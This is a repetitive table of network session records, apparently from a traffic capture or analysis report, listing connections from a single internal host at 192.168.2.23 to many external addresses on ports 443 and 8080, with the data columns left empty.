                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13538192.168.2.2337586113.165.2.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13539192.168.2.2358666221.188.206.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13540192.168.2.236036890.62.16.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13541192.168.2.2357268104.19.140.1598080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13542192.168.2.2357372107.154.217.1978080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13543192.168.2.2353240136.91.232.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13544192.168.2.234891244.73.37.5443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13545192.168.2.2342212178.26.0.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13546192.168.2.2357078134.220.176.212443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13547192.168.2.235387437.148.147.151443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13548192.168.2.236045612.204.16.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13549192.168.2.2338772137.58.85.187443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13550192.168.2.233291499.206.237.172443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13551192.168.2.2357678172.78.198.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13552192.168.2.2360362160.168.217.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13553192.168.2.234117245.187.251.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13554192.168.2.2340162201.10.37.124443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13555192.168.2.2333002192.176.14.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13556192.168.2.233426469.31.74.99443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13557192.168.2.234787439.156.200.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13558192.168.2.2359606191.120.53.68443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13559192.168.2.235144291.207.248.241443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13560192.168.2.235928219.43.255.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13561192.168.2.2353168167.253.19.166443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13562192.168.2.234189665.249.137.254443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13563192.168.2.233678499.54.76.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13564192.168.2.2333252191.57.171.153443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13565192.168.2.234793488.197.240.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13566192.168.2.2342392111.51.153.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13567192.168.2.235630289.74.37.30443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13568192.168.2.2337638206.51.38.105443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13569192.168.2.235837842.223.184.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13570192.168.2.2334176114.63.113.158443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13571192.168.2.23374008.88.132.201443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13572192.168.2.2341100172.217.169.137443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13573192.168.2.235294461.162.179.206443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13574192.168.2.235804657.234.41.156443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13575192.168.2.2339556219.34.91.207443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13576192.168.2.2350370105.37.191.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13577192.168.2.2340820162.251.183.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13578192.168.2.233486691.195.156.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13579192.168.2.2360968206.254.20.64443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13580192.168.2.235072291.151.68.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13581192.168.2.235534689.198.114.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13582192.168.2.234414264.149.0.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13583192.168.2.2344660154.72.136.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13584192.168.2.234275473.17.26.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13585192.168.2.2344030202.40.4.97443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13586192.168.2.2358564196.71.75.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13587192.168.2.2346200156.86.244.186443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13588192.168.2.2341506218.172.184.195443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13589192.168.2.2346230104.194.73.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13590192.168.2.233686443.200.193.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13591192.168.2.234239090.202.6.2443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13592192.168.2.2336186114.36.44.42443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13593192.168.2.2352156221.37.190.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13594192.168.2.2338912111.218.120.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13595192.168.2.235022067.193.100.188443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13596192.168.2.23509265.58.223.208443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13597192.168.2.2344510171.166.164.85443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13598192.168.2.235311075.84.30.51443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13599192.168.2.2358202139.187.199.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13600192.168.2.233562262.178.115.164443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13601192.168.2.2343986166.8.138.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13602192.168.2.2334860210.64.224.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13603192.168.2.2349068166.250.146.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13604192.168.2.233883281.3.236.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13605192.168.2.2357888156.100.182.77443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13606192.168.2.2359318179.127.42.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13607192.168.2.2334670150.165.194.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13608192.168.2.2350578190.50.30.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13609192.168.2.2344504112.40.137.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13610192.168.2.2347126136.208.100.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13611192.168.2.23527829.34.235.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13612192.168.2.234023887.130.217.130443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13613192.168.2.2359468133.99.38.149443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13614192.168.2.2354790159.46.93.227443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13615192.168.2.2345710221.156.226.238443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13616192.168.2.2337418132.11.240.171443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13617192.168.2.2343122179.87.82.223443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13618192.168.2.2349760110.91.63.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13619192.168.2.2358294206.229.16.214443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13620192.168.2.2350448149.145.73.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13621192.168.2.2355168197.250.151.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13622192.168.2.235716458.244.230.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13623192.168.2.2345428163.84.249.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13624192.168.2.2350230143.208.66.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13625192.168.2.234725645.69.24.237443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13626192.168.2.234649693.146.23.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13627192.168.2.2354264147.22.215.6443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13628192.168.2.2342284124.247.216.79443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13629192.168.2.2345404126.187.134.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13630192.168.2.2341332129.95.117.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13631192.168.2.2355522100.43.226.244443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13632192.168.2.2353540140.7.84.39443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13633192.168.2.234406442.5.165.93443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13634192.168.2.233824639.241.150.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13635192.168.2.2346542195.173.225.165443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13636192.168.2.2339626152.217.210.73443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13637192.168.2.2358112203.31.123.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13638192.168.2.233862844.234.87.12443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13639192.168.2.23475841.226.130.240443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13640192.168.2.2360740117.59.98.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13641192.168.2.2335170176.208.207.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13642192.168.2.234264447.186.64.209443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13643192.168.2.233747849.48.68.193443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13644192.168.2.234031464.53.97.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13645192.168.2.2336120177.121.68.161443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13646192.168.2.2338530184.149.146.210443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13647192.168.2.235009420.26.89.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13648192.168.2.2352454147.99.72.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13649192.168.2.2359464152.13.197.61443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13650192.168.2.235146475.162.196.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13651192.168.2.235260861.55.45.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13652192.168.2.2339072206.80.218.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13653192.168.2.2348812218.234.65.10443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13654192.168.2.235103067.82.14.146443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13655192.168.2.23483125.110.19.103443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13656192.168.2.2336960213.77.189.224443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13657192.168.2.234587619.124.31.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13658192.168.2.234276075.206.82.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13659192.168.2.235672694.47.0.54443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13660192.168.2.2335892132.138.82.180443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13661192.168.2.2356668175.147.226.221443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13662192.168.2.2350152136.101.233.76443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13663192.168.2.2360274158.199.70.89443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13664192.168.2.2338622105.220.10.179443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13665192.168.2.2344278208.207.164.95443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13666192.168.2.2359766115.46.98.41443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13667192.168.2.2333270194.18.195.112443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13668192.168.2.2345440134.206.106.246443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13669192.168.2.2346236146.197.9.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13670192.168.2.233308438.188.167.185443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13671192.168.2.2346424182.182.25.251443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13672192.168.2.234705498.207.49.183443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13673192.168.2.2348040206.0.137.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13674192.168.2.2346130220.163.126.114443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13675192.168.2.2352188154.99.190.116443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13676192.168.2.2357694123.183.16.162443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13677192.168.2.2357290203.252.58.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13678192.168.2.235801087.195.116.62443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13679192.168.2.2338856164.214.19.143443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13680192.168.2.2338478107.170.63.148080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13681192.168.2.235284490.179.52.1818080
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13682192.168.2.2345890111.86.238.147443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13683192.168.2.23531605.8.83.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13684192.168.2.233314092.119.177.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13685192.168.2.234274891.90.236.248443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13686192.168.2.233774473.203.132.242443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13687192.168.2.2337544175.219.226.226443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13688192.168.2.2344172116.156.245.170443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13689192.168.2.2353320108.118.239.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13690192.168.2.233765214.111.1.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13691192.168.2.2336952122.135.231.72443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13692192.168.2.234311037.22.171.152443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13693192.168.2.2337726143.131.238.38443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13694192.168.2.236036099.104.61.36443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13695192.168.2.23425384.44.15.191443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13696192.168.2.2348050107.72.210.23443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13697192.168.2.2345842187.43.31.245443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13698192.168.2.234447639.15.65.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13699192.168.2.2336764145.172.111.14443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13700192.168.2.2360554143.99.86.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13701192.168.2.2338232130.35.218.233443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13702192.168.2.235415419.153.61.190443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13703192.168.2.2353966209.189.254.20443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13704192.168.2.2335038166.135.39.140443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13705192.168.2.2355108152.217.62.205443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13706192.168.2.236059090.136.66.4443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13707192.168.2.2333352109.33.158.145443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13708192.168.2.234842823.142.199.107443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13709192.168.2.2352178206.251.150.134443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13710192.168.2.2351602171.206.61.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13711192.168.2.2340590178.17.4.249443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13712192.168.2.233691661.186.157.176443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13713192.168.2.234740082.255.228.31443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13714192.168.2.2338638101.57.150.157443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13715192.168.2.234733296.112.61.43443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13716192.168.2.235682482.231.21.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13717192.168.2.235594818.189.225.132443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13718192.168.2.2336084174.74.107.178443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13719192.168.2.235818485.17.161.88443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13720192.168.2.23489728.198.15.182443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13721192.168.2.235367844.138.11.141443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13722192.168.2.233531425.173.130.229443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13723192.168.2.2355948141.46.244.174443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13724192.168.2.234925257.28.232.202443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13725192.168.2.2360910209.176.33.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13726192.168.2.234173881.184.10.173443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13727192.168.2.2359056141.73.180.33443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13728192.168.2.2347694182.226.100.50443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13729192.168.2.2341278175.237.89.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13730192.168.2.2358542162.117.53.111443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13731192.168.2.235926231.60.194.243443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13732192.168.2.2336440116.248.115.16443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13733192.168.2.235151636.70.136.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13734192.168.2.2339446103.128.46.228443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13735192.168.2.2360562195.153.104.148443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13736192.168.2.234765897.178.71.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13737192.168.2.2333876166.177.125.113443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13738192.168.2.233745697.172.168.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13739192.168.2.236018243.237.201.18443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13740192.168.2.235106487.28.119.15443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13741192.168.2.2342922171.220.245.219443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13742192.168.2.2343666195.229.16.86443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13743192.168.2.2355626132.129.125.108443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13744192.168.2.233434841.50.207.63443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13745192.168.2.236014859.254.94.150443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13746192.168.2.235508043.11.32.55443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13747192.168.2.233431037.26.225.57443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13748192.168.2.23385484.230.156.17443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13749192.168.2.234162086.176.102.87443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13750192.168.2.2353974158.190.110.110443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13751192.168.2.2349792125.207.203.123443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13752192.168.2.234004238.5.122.94443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13753192.168.2.235870073.169.146.11443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13754192.168.2.235635691.5.43.9443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13755192.168.2.2348758219.92.37.163443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13756192.168.2.2333374200.64.66.199443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13757192.168.2.2358986135.9.201.136443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13758192.168.2.2348670220.104.237.0443
                                          TimestampBytes transferredDirectionData


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          13759192.168.2.2357854115.247.93.54443
